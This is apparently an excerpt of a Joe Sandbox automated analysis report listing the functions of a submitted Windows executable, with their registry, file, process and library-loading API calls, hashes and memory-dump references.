Instruction ID: 8594309fab6a939f8579025671b20e25c27ad2f20b93bd04310bc8f9388019e2
Opcode Fuzzy Hash: 702cc36666a341df00ed023e166d9505421316bb70e071c2ca241f15019959e6
Instruction Fuzzy Hash: A6713471E04228CBDF28CF98C844BADBBB1FF45305F14806AD816BB281D778A986DF45

Function 00406F68 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
Instruction ID: 804367245b599a5d262e6525417658d62bb0317a144133a249ff79fbb491f744
Opcode Fuzzy Hash: 97fac772243d771687d70cd7bd51d4e603ca3fb4096038018fdbee07d45d8760
Instruction Fuzzy Hash: 04712571E04228CBDF28CF98C854BADBBB1FF44305F15806AD856B7281C778A986DF45

Function 004025C3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025F6
RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 00402609
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
Instruction ID: c62eb347aa92c0fd77e7ee5b530510020135478b5af5e66508d185aa27a1e92b
Opcode Fuzzy Hash: 8d5b146921c23c5c32305bf675c8714087916087c3c12a48a2612aa1a4d71ea8
Instruction Fuzzy Hash: BE01BC71A04205BBEB149F94DE48AAFB668EF80308F10443EF001B21D0D7B84E41976D

Function 0040204F Relevance: 3.1, APIs: 2, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406935: GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
Part of subcall function 00406935: GetProcAddress.KERNEL32(00000000,?), ref: 00406962

GetFileVersionInfoSizeW.KERNELBASE(0000000B,00000000,?,000000EE), ref: 00402065
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00402084

Part of subcall function 00406488: wsprintfW.USER32 ref: 00406495

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
String ID:
API String ID: 2520467145-0
Opcode ID: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
Instruction ID: 28cb58910f6a4acfd0ff51bb22372a53c51a3c4cd31b2d17a05334ea7d98b38a
Opcode Fuzzy Hash: 151af76542c190628ef2acf394a4985ed8648910b70884bb67486c00b137938c
Instruction Fuzzy Hash: 9E210871A00218AFDB10DFE9C985AEEBBB4EF08344F51402AFA05B62E0D7759E51DB64

Function 0040254F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
RegCloseKey.KERNELBASE(?,?,?,lftninger\slangetmmerens,00000000,00000011,00000002), ref: 00402622

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
Instruction ID: d59507dec88f13297dcb42e268b6e0170753ff524d958fced3891ef78adf3038
Opcode Fuzzy Hash: 77a5136ceac10c13572c025ea85aaea8472d44a7460d1c056a70da611617ceba
Instruction Fuzzy Hash: 8F118C71904216EADF15DFA0CA589AEB7B4FF04348F20443FE806B62D0D3B84A45DB9D

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C

Function 00402459 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040247B
RegCloseKey.ADVAPI32(00000000), ref: 00402484

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CloseDeleteValue
String ID:
API String ID: 2831762973-0
Opcode ID: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
Instruction ID: 8adcbc206ff712accdb54216371371453b286a19eaa2ac3ec43ed269339827cd
Opcode Fuzzy Hash: eee6be69eae89fba413121a175eacf98509731d8aa1df2795f329d1288486e8c
Instruction Fuzzy Hash: 48F09C32A04521ABDB10BBA9DB8D5EE7265AB44354F11443FF502B71C1CAFC4D02977D

Function 00405699 Relevance: 3.0, APIs: 2, Instructions: 32comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004056A9

Part of subcall function 0040450C: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040451E

CoUninitialize.COMBASE(00000404,00000000), ref: 004056F5

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: InitializeMessageSendUninitialize
String ID:
API String ID: 2896919175-0
Opcode ID: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction ID: b888f1dcde8397bdf9a4ac710541df7d57aeeece4d3a8f29a6716c55d94af5f1
Opcode Fuzzy Hash: e6b44ab65c096e2096ca35a4d59063f1915fe47593d787d59728b780318f1d57
Instruction Fuzzy Hash: 0AF0B4776007409BE7115B54AE05B5B77B0EB90354F85483AEF8D726F1C7764C028B5D

Function 00405B24 Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F10,?,?,?,0042C800,?), ref: 00405B4D
CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405B5A

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-0
Opcode ID: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction ID: 3e6b85693243cf5959e47e0a5ce0ecee53803ede082a99688cf67a66356fc275
Opcode Fuzzy Hash: ab728716b39bc4ae5022fc4c28ab15e9e5542c8e0cf41f1555c5a84b4fa30c9d
Instruction Fuzzy Hash: 3AE0BFB4A10219BFFB10AB64ED05F7B77BCF704604F418825BD10F2551D774A9148A7C

Function 00406935 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040362C,0000000C,?,?,?,?,?,?,?,?), ref: 00406947
GetProcAddress.KERNEL32(00000000,?), ref: 00406962

Part of subcall function 004068C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068DC
Part of subcall function 004068C5: wsprintfW.USER32 ref: 00406917
Part of subcall function 004068C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040692B

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction ID: 5f896a6f513cb693e05c26686958cbb9026995673407ad46a654cc37c4de4e39
Opcode Fuzzy Hash: 38b25401b771ecf209a524bd0999a173af8b0ad39984603ae0a2953bb283c85e
Instruction Fuzzy Hash: BCE0CD73604310EBD61067755D0493773E89F85B50302483EF947F2140D734DC32A7AA

Function 00406031 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction ID: 9d50a09f5748d4f60ef03139cc16a9656d1073ae209d3065c053d14625e31d4c
Opcode Fuzzy Hash: 6be4d53c09d0ea7202590e2ef391dde9d68f005235e9a58d36352f422cb06a2c
Instruction Fuzzy Hash: 87D09E31654301AFEF098F20DE16F2EBAA2EB84B00F11552CB682941E0DA715819DB15

Function 0040600C Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C11,?,?,00000000,00405DE7,?,?,?,?), ref: 00406011
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406025

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction ID: fbd6844141adfc982ff7d741096df028d7bbee698e850df9006aa2ae5f51d9dd
Opcode Fuzzy Hash: bc30e5c928ed30f9cb3e730bb3a024ff28878b527ec9bdb2640fa07c227b463d
Instruction Fuzzy Hash: 24D0C972504221AFC2103728EE0889BBF55DB542717028A35F8A9A22B0CB304C668694

Function 00405AEF Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,0040350F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00405AF5
GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405B03

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction ID: c3646108da72950d5b730f2af08982bf7448ccd78712563759f5c9f930c8cbe9
Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
Instruction Fuzzy Hash: 11C04C70244906DAD6509B219F0C71779A0EB50781F195839A586E50A0DA34B455D92D

Function 004023D7 Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D

Function 004063DC Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406405

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130439401.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130457600.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2130601000.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ugpJX5h56S.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction ID: 15c5175e75f921513b7f3d75ccef30e451623c4c54541e9d5ee9eac1385433f3
Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
Instruction Fuzzy Hash: 1DE0E6B2010109BFEF195F50DD0AD7B371DEB04310F01492EFE16D4051E6B5E9306674

Function 004060E3 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040349F,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060F7

Memory Dump Source

Source File: 00000000.00000002.2130418236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2130400364.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
